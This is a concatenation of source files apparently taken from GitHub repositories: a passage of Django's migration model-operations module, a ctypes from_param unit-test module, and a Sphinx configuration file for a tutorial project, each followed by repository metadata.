                models_to_check.append(field.remote_field.model)
        # Now go over all the models and check against them
        for model in models_to_check:
            model_app_label, model_name = self.model_to_key(model)
            if model_name.lower() == name_lower:
                if app_label is None or not model_app_label or model_app_label == app_label:
                    return True
        return False
    def model_to_key(self, model):
        """
        Take either a model class or an "app_label.ModelName" string
        and return (app_label, object_name).
        """
        if isinstance(model, six.string_types):
            return model.split(".", 1)
        else:
            return model._meta.app_label, model._meta.object_name
    def reduce(self, operation, in_between, app_label=None):
        """Try to fold a later operation into this CreateModel."""
        # Create followed by delete of a non-proxy model cancels out entirely.
        if (isinstance(operation, DeleteModel) and
                self.name_lower == operation.name_lower and
                not self.options.get("proxy", False)):
            return []
        elif isinstance(operation, RenameModel) and self.name_lower == operation.old_name_lower:
            # Create-then-rename collapses to creating under the new name.
            return [
                CreateModel(
                    operation.new_name,
                    fields=self.fields,
                    options=self.options,
                    bases=self.bases,
                    managers=self.managers,
                ),
            ]
        elif isinstance(operation, FieldOperation) and self.name_lower == operation.model_name_lower:
            if isinstance(operation, AddField):
                # Don't allow optimizations of FKs through models they reference
                if hasattr(operation.field, "remote_field") and operation.field.remote_field:
                    for between in in_between:
                        # Check that it doesn't point to the model
                        app_label, object_name = self.model_to_key(operation.field.remote_field.model)
                        if between.references_model(object_name, app_label):
                            # False = this pair cannot be optimized across.
                            return False
                        # Check that it's not through the model
                        if getattr(operation.field.remote_field, "through", None):
                            app_label, object_name = self.model_to_key(operation.field.remote_field.through)
                            if between.references_model(object_name, app_label):
                                return False
                # Fold the added field into the creation itself.
                return [
                    CreateModel(
                        self.name,
                        fields=self.fields + [(operation.name, operation.field)],
                        options=self.options,
                        bases=self.bases,
                        managers=self.managers,
                    ),
                ]
            elif isinstance(operation, AlterField):
                # Swap in the altered field definition.
                return [
                    CreateModel(
                        self.name,
                        fields=[
                            (n, operation.field if n == operation.name else v)
                            for n, v in self.fields
                        ],
                        options=self.options,
                        bases=self.bases,
                        managers=self.managers,
                    ),
                ]
            elif isinstance(operation, RemoveField):
                # Drop the removed field from the creation.
                return [
                    CreateModel(
                        self.name,
                        fields=[
                            (n, v)
                            for n, v in self.fields
                            if n.lower() != operation.name_lower
                        ],
                        options=self.options,
                        bases=self.bases,
                        managers=self.managers,
                    ),
                ]
            elif isinstance(operation, RenameField):
                # Rename the field inside the creation.
                return [
                    CreateModel(
                        self.name,
                        fields=[
                            (operation.new_name if n == operation.old_name else n, v)
                            for n, v in self.fields
                        ],
                        options=self.options,
                        bases=self.bases,
                        managers=self.managers,
                    ),
                ]
        return super(CreateModel, self).reduce(operation, in_between, app_label=app_label)
class DeleteModel(ModelOperation):
    """
    Drops a model's table.
    """
    def deconstruct(self):
        """Return (class name, args, kwargs) for serializing this operation."""
        return (self.__class__.__name__, [], {'name': self.name})
    def state_forwards(self, app_label, state):
        # Removing the model from project state drops its fields with it.
        state.remove_model(app_label, self.name_lower)
    def database_forwards(self, app_label, schema_editor, from_state, to_state):
        model = from_state.apps.get_model(app_label, self.name)
        if self.allow_migrate_model(schema_editor.connection.alias, model):
            schema_editor.delete_model(model)
    def database_backwards(self, app_label, schema_editor, from_state, to_state):
        # Reversing a delete re-creates the table from the target state.
        model = to_state.apps.get_model(app_label, self.name)
        if self.allow_migrate_model(schema_editor.connection.alias, model):
            schema_editor.create_model(model)
    def describe(self):
        return "Delete model %s" % (self.name, )
class RenameModel(ModelOperation):
    """
    Renames a model.
    """
    def __init__(self, old_name, new_name):
        self.old_name = old_name
        self.new_name = new_name
        super(RenameModel, self).__init__(old_name)
    @cached_property
    def old_name_lower(self):
        return self.old_name.lower()
    @cached_property
    def new_name_lower(self):
        return self.new_name.lower()
    def deconstruct(self):
        """Return (class name, args, kwargs) for serializing this operation."""
        kwargs = {
            'old_name': self.old_name,
            'new_name': self.new_name,
        }
        return (
            self.__class__.__name__,
            [],
            kwargs
        )
    def state_forwards(self, app_label, state):
        apps = state.apps
        model = apps.get_model(app_label, self.old_name)
        model._meta.apps = apps
        # Get all of the related objects we need to repoint
        all_related_objects = (
            f for f in model._meta.get_fields(include_hidden=True)
            if f.auto_created and not f.concrete and (not f.hidden or f.many_to_many)
        )
        # Rename the model
        state.models[app_label, self.new_name_lower] = state.models[app_label, self.old_name_lower]
        state.models[app_label, self.new_name_lower].name = self.new_name
        state.remove_model(app_label, self.old_name_lower)
        # Repoint the FKs and M2Ms pointing to us
        for related_object in all_related_objects:
            if related_object.model is not model:
                # The model being renamed does not participate in this relation
                # directly. Rather, a superclass does.
                continue
            # Use the new related key for self referential related objects.
            if related_object.related_model == model:
                related_key = (app_label, self.new_name_lower)
            else:
                related_key = (
                    related_object.related_model._meta.app_label,
                    related_object.related_model._meta.model_name,
                )
            # Clone each field that pointed at the old name so the shared
            # field instances in other states are not mutated.
            new_fields = []
            for name, field in state.models[related_key].fields:
                if name == related_object.field.name:
                    field = field.clone()
                    field.remote_field.model = "%s.%s" % (app_label, self.new_name)
                new_fields.append((name, field))
            state.models[related_key].fields = new_fields
            state.reload_model(*related_key)
        # Repoint M2Ms with through pointing to us
        related_models = {
            f.remote_field.model for f in model._meta.fields
            if getattr(f.remote_field, 'model', None)
        }
        model_name = '%s.%s' % (app_label, self.old_name)
        for related_model in related_models:
            if related_model == model:
                related_key = (app_label, self.new_name_lower)
            else:
                related_key = (related_model._meta.app_label, related_model._meta.model_name)
            new_fields = []
            changed = False
            for name, field in state.models[related_key].fields:
                if field.is_relation and field.many_to_many and field.remote_field.through == model_name:
                    field = field.clone()
                    field.remote_field.through = '%s.%s' % (app_label, self.new_name)
                    changed = True
                new_fields.append((name, field))
            # Only reload when something actually changed, to avoid churn.
            if changed:
                state.models[related_key].fields = new_fields
                state.reload_model(*related_key)
        state.reload_model(app_label, self.new_name_lower)
    def database_forwards(self, app_label, schema_editor, from_state, to_state):
        new_model = to_state.apps.get_model(app_label, self.new_name)
        if self.allow_migrate_model(schema_editor.connection.alias, new_model):
            old_model = from_state.apps.get_model(app_label, self.old_name)
            # Move the main table
            schema_editor.alter_db_table(
                new_model,
                old_model._meta.db_table,
                new_model._meta.db_table,
            )
            # Alter the fields pointing to us
            for related_object in old_model._meta.related_objects:
                if related_object.related_model == old_model:
                    model = new_model
                    related_key = (app_label, self.new_name_lower)
                else:
                    model = related_object.related_model
                    related_key = (
                        related_object.related_model._meta.app_label,
                        related_object.related_model._meta.model_name,
                    )
                to_field = to_state.apps.get_model(
                    *related_key
                )._meta.get_field(related_object.field.name)
                schema_editor.alter_field(
                    model,
                    related_object.field,
                    to_field,
                )
            # Rename M2M fields whose name is based on this model's name.
            fields = zip(old_model._meta.local_many_to_many, new_model._meta.local_many_to_many)
            for (old_field, new_field) in fields:
                # Skip self-referential fields as these are renamed above.
                if new_field.model == new_field.related_model or not new_field.remote_field.through._meta.auto_created:
                    continue
                # Rename the M2M table that's based on this model's name.
                old_m2m_model = old_field.remote_field.through
                new_m2m_model = new_field.remote_field.through
                schema_editor.alter_db_table(
                    new_m2m_model,
                    old_m2m_model._meta.db_table,
                    new_m2m_model._meta.db_table,
                )
                # Rename the column in the M2M table that's based on this
                # model's name.
                schema_editor.alter_field(
                    new_m2m_model,
                    old_m2m_model._meta.get_field(old_model._meta.model_name),
                    new_m2m_model._meta.get_field(new_model._meta.model_name),
                )
    def database_backwards(self, app_label, schema_editor, from_state, to_state):
        # Temporarily swap old/new names, run forwards, then swap back so
        # the operation object is left unmodified.
        self.new_name_lower, self.old_name_lower = self.old_name_lower, self.new_name_lower
        self.new_name, self.old_name = self.old_name, self.new_name
        self.database_forwards(app_label, schema_editor, from_state, to_state)
        self.new_name_lower, self.old_name_lower = self.old_name_lower, self.new_name_lower
        self.new_name, self.old_name = self.old_name, self.new_name
    def references_model(self, name, app_label=None):
        # A rename touches both the old and the new names.
        return (
            name.lower() == self.old_name_lower or
            name.lower() == self.new_name_lower
        )
    def describe(self):
        return "Rename model %s to %s" % (self.old_name, self.new_name)
    def reduce(self, operation, in_between, app_label=None):
        # Two consecutive renames of the same model collapse into one.
        if (isinstance(operation, RenameModel) and
                self.new_name_lower == operation.old_name_lower):
            return [
                RenameModel(
                    self.old_name,
                    operation.new_name,
                ),
            ]
        # Skip `ModelOperation.reduce` as we want to run `references_model`
        # against self.new_name.
        return (
            super(ModelOperation, self).reduce(operation, in_between, app_label=app_label) or
            not operation.references_model(self.new_name, app_label)
        )
class AlterModelTable(ModelOperation):
    """
    Renames a model's table
    """
    def __init__(self, name, table):
        self.table = table
        super(AlterModelTable, self).__init__(name)
    def deconstruct(self):
        """Return (class name, args, kwargs) for serializing this operation."""
        kwargs = {
            'name': self.name,
            'table': self.table,
        }
        return (
            self.__class__.__name__,
            [],
            kwargs
        )
    def state_forwards(self, app_label, state):
        state.models[app_label, self.name_lower].options["db_table"] = self.table
        state.reload_model(app_label, self.name_lower)
    def database_forwards(self, app_label, schema_editor, from_state, to_state):
        new_model = to_state.apps.get_model(app_label, self.name)
        if self.allow_migrate_model(schema_editor.connection.alias, new_model):
            old_model = from_state.apps.get_model(app_label, self.name)
            schema_editor.alter_db_table(
                new_model,
                old_model._meta.db_table,
                new_model._meta.db_table,
            )
            # Rename M2M fields whose name is based on this model's db_table
            for (old_field, new_field) in zip(old_model._meta.local_many_to_many, new_model._meta.local_many_to_many):
                if new_field.remote_field.through._meta.auto_created:
                    schema_editor.alter_db_table(
                        new_field.remote_field.through,
                        old_field.remote_field.through._meta.db_table,
                        new_field.remote_field.through._meta.db_table,
                    )
    def database_backwards(self, app_label, schema_editor, from_state, to_state):
        # Symmetric: forwards with swapped states performs the reverse rename.
        return self.database_forwards(app_label, schema_editor, from_state, to_state)
    def describe(self):
        return "Rename table for %s to %s" % (
            self.name,
            self.table if self.table is not None else "(default)"
        )
    def reduce(self, operation, in_between, app_label=None):
        # A later table rename or delete of the same model supersedes this.
        if isinstance(operation, (AlterModelTable, DeleteModel)) and self.name_lower == operation.name_lower:
            return [operation]
        return super(AlterModelTable, self).reduce(operation, in_between, app_label=app_label)
class ModelOptionOperation(ModelOperation):
    """Base class for operations that change a single model option."""
    def reduce(self, operation, in_between, app_label=None):
        # A later option change of the same kind, or a delete, of the same
        # model makes this operation redundant.
        same_model = self.name_lower == operation.name_lower
        if same_model and isinstance(operation, (self.__class__, DeleteModel)):
            return [operation]
        return super(ModelOptionOperation, self).reduce(operation, in_between, app_label=app_label)
class FieldRelatedOptionOperation(ModelOptionOperation):
    """Base class for option operations whose value references fields."""
    def reduce(self, operation, in_between, app_label=None):
        # A field operation on the same model may be hoisted before this
        # option change, provided the option does not mention that field.
        if isinstance(operation, FieldOperation):
            if (self.name_lower == operation.model_name_lower and
                    not self.references_field(operation.model_name, operation.name)):
                return [operation, self]
        return super(FieldRelatedOptionOperation, self).reduce(operation, in_between, app_label=app_label)
class AlterUniqueTogether(FieldRelatedOptionOperation):
    """
    Changes the value of unique_together to the target one.
    Input value of unique_together must be a set of tuples.
    """
    option_name = "unique_together"
    def __init__(self, name, unique_together):
        # normalize_together accepts a single tuple shorthand and returns
        # the canonical tuple-of-tuples form.
        unique_together = normalize_together(unique_together)
        self.unique_together = set(tuple(cons) for cons in unique_together)
        super(AlterUniqueTogether, self).__init__(name)
    def deconstruct(self):
        """Return (class name, args, kwargs) for serializing this operation."""
        kwargs = {
            'name': self.name,
            'unique_together': self.unique_together,
        }
        return (
            self.__class__.__name__,
            [],
            kwargs
        )
    def state_forwards(self, app_label, state):
        model_state = state.models[app_label, self.name_lower]
        model_state.options[self.option_name] = self.unique_together
        state.reload_model(app_label, self.name_lower)
    def database_forwards(self, app_label, schema_editor, from_state, to_state):
        new_model = to_state.apps.get_model(app_label, self.name)
        if self.allow_migrate_model(schema_editor.connection.alias, new_model):
            old_model = from_state.apps.get_model(app_label, self.name)
            # The schema editor diffs old vs. new sets itself.
            schema_editor.alter_unique_together(
                new_model,
                getattr(old_model._meta, self.option_name, set()),
                getattr(new_model._meta, self.option_name, set()),
            )
    def database_backwards(self, app_label, schema_editor, from_state, to_state):
        # Symmetric: forwards with swapped states reverses the change.
        return self.database_forwards(app_label, schema_editor, from_state, to_state)
    def references_field(self, model_name, name, app_label=None):
        # An empty constraint set still "references" every field of the model.
        return (
            self.references_model(model_name, app_label) and
            (
                not self.unique_together or
                any((name in together) for together in self.unique_together)
            )
        )
    def describe(self):
        # `or ''` makes len() safe when the value is falsy.
        return "Alter %s for %s (%s constraint(s))" % (self.option_name, self.name, len(self.unique_together or ''))
class AlterIndexTogether(FieldRelatedOptionOperation):
    """
    Changes the value of index_together to the target one.
    Input value of index_together must be a set of tuples.
    """
    option_name = "index_together"
    def __init__(self, name, index_together):
        # normalize_together accepts a single tuple shorthand and returns
        # the canonical tuple-of-tuples form.
        index_together = normalize_together(index_together)
        self.index_together = set(tuple(cons) for cons in index_together)
        super(AlterIndexTogether, self).__init__(name)
    def deconstruct(self):
        """Return (class name, args, kwargs) for serializing this operation."""
        kwargs = {
            'name': self.name,
            'index_together': self.index_together,
        }
        return (
            self.__class__.__name__,
            [],
            kwargs
        )
    def state_forwards(self, app_label, state):
        model_state = state.models[app_label, self.name_lower]
        model_state.options[self.option_name] = self.index_together
        state.reload_model(app_label, self.name_lower)
    def database_forwards(self, app_label, schema_editor, from_state, to_state):
        new_model = to_state.apps.get_model(app_label, self.name)
        if self.allow_migrate_model(schema_editor.connection.alias, new_model):
            old_model = from_state.apps.get_model(app_label, self.name)
            # The schema editor diffs old vs. new sets itself.
            schema_editor.alter_index_together(
                new_model,
                getattr(old_model._meta, self.option_name, set()),
                getattr(new_model._meta, self.option_name, set()),
            )
    def database_backwards(self, app_label, schema_editor, from_state, to_state):
        # Symmetric: forwards with swapped states reverses the change.
        return self.database_forwards(app_label, schema_editor, from_state, to_state)
    def references_field(self, model_name, name, app_label=None):
        # An empty index set still "references" every field of the model.
        return (
            self.references_model(model_name, app_label) and
            (
                not self.index_together or
                any((name in together) for together in self.index_together)
            )
        )
    def describe(self):
        # `or ''` makes len() safe when the value is falsy.
        return "Alter %s for %s (%s constraint(s))" % (self.option_name, self.name, len(self.index_together or ''))
class AlterOrderWithRespectTo(FieldRelatedOptionOperation):
    """Represent a change to the model's ``order_with_respect_to`` option."""

    def __init__(self, name, order_with_respect_to):
        self.order_with_respect_to = order_with_respect_to
        super(AlterOrderWithRespectTo, self).__init__(name)

    def deconstruct(self):
        return (
            self.__class__.__name__,
            [],
            {'name': self.name, 'order_with_respect_to': self.order_with_respect_to},
        )

    def state_forwards(self, app_label, state):
        model_state = state.models[app_label, self.name_lower]
        model_state.options['order_with_respect_to'] = self.order_with_respect_to
        state.reload_model(app_label, self.name_lower)

    def database_forwards(self, app_label, schema_editor, from_state, to_state):
        to_model = to_state.apps.get_model(app_label, self.name)
        if not self.allow_migrate_model(schema_editor.connection.alias, to_model):
            return
        from_model = from_state.apps.get_model(app_label, self.name)
        had_order = from_model._meta.order_with_respect_to
        wants_order = to_model._meta.order_with_respect_to
        if had_order and not wants_order:
            # The option was removed: drop the implicit _order column.
            schema_editor.remove_field(from_model, from_model._meta.get_field("_order"))
        elif wants_order and not had_order:
            # The option was added: create the implicit _order column.
            # (Altering the column itself is untouched as it's likely a rename.)
            field = to_model._meta.get_field("_order")
            if not field.has_default():
                field.default = 0
            schema_editor.add_field(from_model, field)

    def database_backwards(self, app_label, schema_editor, from_state, to_state):
        # Symmetric: re-running forwards with swapped states reverses it.
        self.database_forwards(app_label, schema_editor, from_state, to_state)

    def references_field(self, model_name, name, app_label=None):
        """Return whether this operation references the given model field."""
        if not self.references_model(model_name, app_label):
            return False
        # When the option is None (being cleared), any field may be affected.
        return self.order_with_respect_to is None or name == self.order_with_respect_to

    def describe(self):
        return "Set order_with_respect_to on %s to %s" % (self.name, self.order_with_respect_to)
class AlterModelOptions(ModelOptionOperation):
    """
    Set new model options that don't directly affect the database schema
    (like verbose_name, permissions, ordering). Python code in migrations
    may still need them.
    """
    # Options compared and preserved by this operation. Any key listed here
    # that is absent from the new options dict is removed from the state.
    ALTER_OPTION_KEYS = [
        "base_manager_name",
        "default_manager_name",
        "get_latest_by",
        "managed",
        "ordering",
        "permissions",
        "default_permissions",
        "select_on_save",
        "verbose_name",
        "verbose_name_plural",
    ]

    def __init__(self, name, options):
        self.options = options
        super(AlterModelOptions, self).__init__(name)

    def deconstruct(self):
        return (
            self.__class__.__name__,
            [],
            {'name': self.name, 'options': self.options},
        )

    def state_forwards(self, app_label, state):
        model_state = state.models[app_label, self.name_lower]
        # Work on a copy so shared state dicts are never mutated in place.
        new_options = dict(model_state.options)
        new_options.update(self.options)
        for key in self.ALTER_OPTION_KEYS:
            if key not in self.options:
                new_options.pop(key, None)
        model_state.options = new_options
        state.reload_model(app_label, self.name_lower)

    def database_forwards(self, app_label, schema_editor, from_state, to_state):
        # Pure Meta changes: nothing to do at the database level.
        pass

    def database_backwards(self, app_label, schema_editor, from_state, to_state):
        pass

    def describe(self):
        return "Change Meta options on %s" % (self.name, )
class AlterModelManagers(ModelOptionOperation):
    """Replace the model's managers with the given list."""

    # Managers get special expansion treatment during serialization.
    serialization_expand_args = ['managers']

    def __init__(self, name, managers):
        self.managers = managers
        super(AlterModelManagers, self).__init__(name)

    def deconstruct(self):
        # Managers are passed positionally, not as kwargs.
        return (self.__class__.__name__, [self.name, self.managers], {})

    def state_forwards(self, app_label, state):
        model_state = state.models[app_label, self.name_lower]
        model_state.managers = list(self.managers)
        state.reload_model(app_label, self.name_lower)

    def database_forwards(self, app_label, schema_editor, from_state, to_state):
        # Managers are a pure-Python concept; the database is untouched.
        pass

    def database_backwards(self, app_label, schema_editor, from_state, to_state):
        pass

    def describe(self):
        return "Change managers on %s" % (self.name, )
class IndexOperation(Operation):
    # Shared base for AddIndex/RemoveIndex; indexes are stored in the model
    # state under this options key.
    option_name = 'indexes'
    @cached_property
    def model_name_lower(self):
        """Lower-cased model name, the key used for migration-state lookups."""
        return self.model_name.lower()
class AddIndex(IndexOperation):
    """Add an index on a model. The index must carry an explicit name."""

    def __init__(self, model_name, index):
        self.model_name = model_name
        if not index.name:
            # A name is mandatory so RemoveIndex can locate the index later.
            raise ValueError(
                "Indexes passed to AddIndex operations require a name "
                "argument. %r doesn't have one." % index
            )
        self.index = index

    def state_forwards(self, app_label, state):
        state.models[app_label, self.model_name_lower].options[self.option_name].append(self.index)

    def database_forwards(self, app_label, schema_editor, from_state, to_state):
        model = to_state.apps.get_model(app_label, self.model_name)
        if self.allow_migrate_model(schema_editor.connection.alias, model):
            schema_editor.add_index(model, self.index)

    def database_backwards(self, app_label, schema_editor, from_state, to_state):
        model = from_state.apps.get_model(app_label, self.model_name)
        if self.allow_migrate_model(schema_editor.connection.alias, model):
            schema_editor.remove_index(model, self.index)

    def deconstruct(self):
        return (
            self.__class__.__name__,
            [],
            {'model_name': self.model_name, 'index': self.index},
        )

    def describe(self):
        fields = ', '.join(self.index.fields)
        return 'Create index %s on field(s) %s of model %s' % (
            self.index.name,
            fields,
            self.model_name,
        )
class RemoveIndex(IndexOperation):
    """Remove the index with the given name from a model."""

    def __init__(self, model_name, name):
        self.model_name = model_name
        self.name = name

    def state_forwards(self, app_label, state):
        model_state = state.models[app_label, self.model_name_lower]
        # Rebuild the list without the removed index.
        kept = [idx for idx in model_state.options[self.option_name] if idx.name != self.name]
        model_state.options[self.option_name] = kept

    def database_forwards(self, app_label, schema_editor, from_state, to_state):
        model = from_state.apps.get_model(app_label, self.model_name)
        if not self.allow_migrate_model(schema_editor.connection.alias, model):
            return
        # Look the index up in the *old* state — it no longer exists in to_state.
        from_model_state = from_state.models[app_label, self.model_name_lower]
        schema_editor.remove_index(model, from_model_state.get_index_by_name(self.name))

    def database_backwards(self, app_label, schema_editor, from_state, to_state):
        model = to_state.apps.get_model(app_label, self.model_name)
        if not self.allow_migrate_model(schema_editor.connection.alias, model):
            return
        to_model_state = to_state.models[app_label, self.model_name_lower]
        schema_editor.add_index(model, to_model_state.get_index_by_name(self.name))

    def deconstruct(self):
        return (
            self.__class__.__name__,
            [],
            {'model_name': self.model_name, 'name': self.name},
        )

    def describe(self):
        return 'Remove index %s from %s' % (self.name, self.model_name)
|
{
"content_hash": "5ded0cbb515fd72e2f852090fc7f92f3",
"timestamp": "",
"source": "github",
"line_count": 845,
"max_line_length": 119,
"avg_line_length": 38.51715976331361,
"alnum_prop": 0.5705287737733125,
"repo_name": "darkryder/django",
"id": "a0e81f5e836297f2256979d68177902d536f6d2c",
"size": "32547",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "django/db/migrations/operations/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "52098"
},
{
"name": "HTML",
"bytes": "174451"
},
{
"name": "JavaScript",
"bytes": "251434"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11327916"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
}
|
"""Tests for ``from_param`` conversions of ctypes simple types.

NOTE(review): this span previously contained an unresolved git merge
conflict (``<<<<<<<``/``=======``/``>>>>>>>`` markers) wrapping three
byte-identical copies of this module, which made the file syntactically
invalid. The conflict is resolved here to a single copy; no test logic
was changed.
"""
import unittest, sys

try:
    from ctypes.test import need_symbol
except ImportError:
    # ``ctypes.test`` is not importable on every interpreter layout (the
    # package was removed from the stdlib in newer CPython releases).
    # Provide an equivalent skip decorator so the module stays importable.
    def need_symbol(name):
        import ctypes
        return unittest.skipUnless(hasattr(ctypes, name),
                                   '{!r} type not present'.format(name))


class SimpleTypesTestCase(unittest.TestCase):

    def setUp(self):
        import ctypes
        try:
            from _ctypes import set_conversion_mode
        except ImportError:
            pass
        else:
            self.prev_conv_mode = set_conversion_mode("ascii", "strict")

    def tearDown(self):
        try:
            from _ctypes import set_conversion_mode
        except ImportError:
            pass
        else:
            set_conversion_mode(*self.prev_conv_mode)

    def test_subclasses(self):
        from ctypes import c_void_p, c_char_p
        # ctypes 0.9.5 and before did overwrite from_param in SimpleType_new
        class CVOIDP(c_void_p):
            def from_param(cls, value):
                return value * 2
            from_param = classmethod(from_param)

        class CCHARP(c_char_p):
            def from_param(cls, value):
                return value * 4
            from_param = classmethod(from_param)

        self.assertEqual(CVOIDP.from_param("abc"), "abcabc")
        self.assertEqual(CCHARP.from_param("abc"), "abcabcabcabc")

    @need_symbol('c_wchar_p')
    def test_subclasses_c_wchar_p(self):
        from ctypes import c_wchar_p

        class CWCHARP(c_wchar_p):
            def from_param(cls, value):
                return value * 3
            from_param = classmethod(from_param)

        self.assertEqual(CWCHARP.from_param("abc"), "abcabcabc")

    # XXX Replace by c_char_p tests
    def test_cstrings(self):
        from ctypes import c_char_p, byref

        # c_char_p.from_param on a Python String packs the string
        # into a cparam object
        s = b"123"
        self.assertIs(c_char_p.from_param(s)._obj, s)

        # new in 0.9.1: convert (encode) unicode to ascii
        self.assertEqual(c_char_p.from_param(b"123")._obj, b"123")
        self.assertRaises(TypeError, c_char_p.from_param, "123\377")
        self.assertRaises(TypeError, c_char_p.from_param, 42)

        # calling c_char_p.from_param with a c_char_p instance
        # returns the argument itself:
        a = c_char_p(b"123")
        self.assertIs(c_char_p.from_param(a), a)

    @need_symbol('c_wchar_p')
    def test_cw_strings(self):
        from ctypes import byref, c_wchar_p

        c_wchar_p.from_param("123")

        self.assertRaises(TypeError, c_wchar_p.from_param, 42)
        self.assertRaises(TypeError, c_wchar_p.from_param, b"123\377")

        pa = c_wchar_p.from_param(c_wchar_p("123"))
        self.assertEqual(type(pa), c_wchar_p)

    def test_int_pointers(self):
        from ctypes import c_short, c_uint, c_int, c_long, POINTER, pointer
        LPINT = POINTER(c_int)

##        p = pointer(c_int(42))
##        x = LPINT.from_param(p)
        x = LPINT.from_param(pointer(c_int(42)))
        self.assertEqual(x.contents.value, 42)
        self.assertEqual(LPINT(c_int(42)).contents.value, 42)

        self.assertEqual(LPINT.from_param(None), None)

        if c_int != c_long:
            self.assertRaises(TypeError, LPINT.from_param, pointer(c_long(42)))
        self.assertRaises(TypeError, LPINT.from_param, pointer(c_uint(42)))
        self.assertRaises(TypeError, LPINT.from_param, pointer(c_short(42)))

    def test_byref_pointer(self):
        # The from_param class method of POINTER(typ) classes accepts what is
        # returned by byref(obj), it type(obj) == typ
        from ctypes import c_short, c_uint, c_int, c_long, pointer, POINTER, byref
        LPINT = POINTER(c_int)

        LPINT.from_param(byref(c_int(42)))

        self.assertRaises(TypeError, LPINT.from_param, byref(c_short(22)))
        if c_int != c_long:
            self.assertRaises(TypeError, LPINT.from_param, byref(c_long(22)))
        self.assertRaises(TypeError, LPINT.from_param, byref(c_uint(22)))

    def test_byref_pointerpointer(self):
        # See above
        from ctypes import c_short, c_uint, c_int, c_long, pointer, POINTER, byref

        LPLPINT = POINTER(POINTER(c_int))
        LPLPINT.from_param(byref(pointer(c_int(42))))

        self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_short(22))))
        if c_int != c_long:
            self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_long(22))))
        self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_uint(22))))

    def test_array_pointers(self):
        from ctypes import c_short, c_uint, c_int, c_long, POINTER
        INTARRAY = c_int * 3
        ia = INTARRAY()
        self.assertEqual(len(ia), 3)
        self.assertEqual([ia[i] for i in range(3)], [0, 0, 0])

        # Pointers are only compatible with arrays containing items of
        # the same type!
        LPINT = POINTER(c_int)
        LPINT.from_param((c_int*3)())
        self.assertRaises(TypeError, LPINT.from_param, c_short*3)
        self.assertRaises(TypeError, LPINT.from_param, c_long*3)
        self.assertRaises(TypeError, LPINT.from_param, c_uint*3)

    def test_noctypes_argtype(self):
        import _ctypes_test
        from ctypes import CDLL, c_void_p, ArgumentError

        func = CDLL(_ctypes_test.__file__)._testfunc_p_p
        func.restype = c_void_p
        # TypeError: has no from_param method
        self.assertRaises(TypeError, setattr, func, "argtypes", (object,))

        class Adapter(object):
            def from_param(cls, obj):
                return None

        func.argtypes = (Adapter(),)
        self.assertEqual(func(None), None)
        self.assertEqual(func(object()), None)

        class Adapter(object):
            def from_param(cls, obj):
                return obj

        func.argtypes = (Adapter(),)
        # don't know how to convert parameter 1
        self.assertRaises(ArgumentError, func, object())
        self.assertEqual(func(c_void_p(42)), 42)

        class Adapter(object):
            def from_param(cls, obj):
                raise ValueError(obj)

        func.argtypes = (Adapter(),)
        # ArgumentError: argument 1: ValueError: 99
        self.assertRaises(ArgumentError, func, 99)

################################################################

if __name__ == '__main__':
    unittest.main()
|
{
"content_hash": "6f49d1ecc890f094723b88be2bd6cbc6",
"timestamp": "",
"source": "github",
"line_count": 534,
"max_line_length": 88,
"avg_line_length": 35.07116104868914,
"alnum_prop": 0.5972340879965826,
"repo_name": "ArcherSys/ArcherSys",
"id": "58a97998afb1ddca42eb181461ff50e43e5c7a39",
"size": "18728",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Lib/ctypes/test/test_parameters.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
}
|
# Sphinx build configuration for the arcade_tutorial documentation.
import sphinx_rtd_theme
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.intersphinx',
              ]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'arcade_tutorial'
copyright = '2017, Paul Everitt'
author = 'Paul Everitt'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
# (the 'env3*' entry keeps local virtualenv directories out of the build).
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', 'env3*']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'arcade_tutorialdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    # 'papersize': 'letterpaper',
    # The font size ('10pt', '11pt' or '12pt').
    #
    # 'pointsize': '10pt',
    # Additional stuff for the LaTeX preamble.
    #
    # 'preamble': '',
    # Latex figure (float) alignment
    #
    # 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'arcade_tutorial.tex', 'arcade\\_tutorial Documentation',
     'Paul Everitt', 'manual'),
]
